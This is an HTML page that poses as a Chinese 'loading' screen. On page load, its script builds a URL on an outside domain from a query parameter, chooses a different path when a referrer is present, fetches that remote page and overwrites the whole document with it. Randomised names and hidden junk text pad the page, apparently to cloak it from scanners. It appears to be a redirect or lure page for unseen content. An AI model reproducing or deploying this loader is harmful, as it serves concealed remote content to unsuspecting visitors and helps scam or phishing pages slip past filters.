<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Q4ZzyW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Q4ZzyW .sNNyFj7AUq {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Q4ZzyW .content {
            line-height: 50px;
            text-align: center
        }

        .Q4ZzyW .img {
            width: 100%
        }

        .Q4ZzyW .oeFBgXJk {
            text-align: center
        }

        .Q4ZzyW .oeFBgXJk span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Q4ZzyW .oeFBgXJk span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Q4ZzyW .oeFBgXJk span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Q4ZzyW .oeFBgXJk span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Q4ZzyW .oeFBgXJk span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Q4ZzyW .oeFBgXJk span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Q4ZzyW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function bmzMdWKC6GiGf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var RcaVLFT = bmzMdWKC6GiGf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ RcaVLFT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ RcaVLFT +".html?a=share";
		}
		
        QzRm5oT=url+"#"+new Date().getTime();
        QzRm5oT && function() {
            $.get(QzRm5oT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>LwfF1VpJJ0Y</span>
<b style='display:none' >psjGHqTcxYKsp9pEKOQrLzj86bC8KtWniia1wYiTdMNtRvEOL5iVpA1aHEeQ13hqLPz17pNK</b>
<h1 style='display:none' >akcBCIrWPDctUvwAWbVTHdEPaOm2f2VpcTMwShr2XF9xlMouePpdMFEXVOhHzBqoNhIcd7MNyAfdub</h1>
<ul style='display:none' >zCd8Ja7Sfao2kHZy0ciPv9TlsB6Q19mDjQ4wgwZGfz2Dn71Cd8ABdNIsEc5KiOaErYlX33VhbSQF7xTgN5NzuAN43oT2IbNwmn</ul>
<h1 style='display:none' >akcBCIrWPDctUvwAWbVTHdEPaOm2f2VpcTMwShr2XF9xlMouePpdMFEXVOhHzBqoNhIcd7MNyAfdub</h1><div class="Q4ZzyW">
    <div class="sNNyFj7AUq">
        <div class="oeFBgXJk">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >emURarMo6yEYhfaEqNJnHYbqa4ABbv7lRfMfkPl2uOJlhyBCYhtpna92oiEFcSzmozmTQ9cXykT</h1>
<ul style='display:none' >nB5EPhn2TQ5Py2NUHl2qmtJZm5rLfqX9CwhxGsEO4m8cfCZxBhAeNmkdqIK77vH7SkE9tsQfjVytqZLFUKfif92aFHRa</ul>
<img  src='' style='display:none'>
<ul style='display:none' >nB5EPhn2TQ5Py2NUHl2qmtJZm5rLfqX9CwhxGsEO4m8cfCZxBhAeNmkdqIK77vH7SkE9tsQfjVytqZLFUKfif92aFHRa</ul>
<p  style='display:none'>MSHEEf7dYJa6zuDxAG5XNfzdOsxHpOSEgCr7qE4GOluIFec0gYMhPLOtCYIOA4Ar3n</p></body>
</html>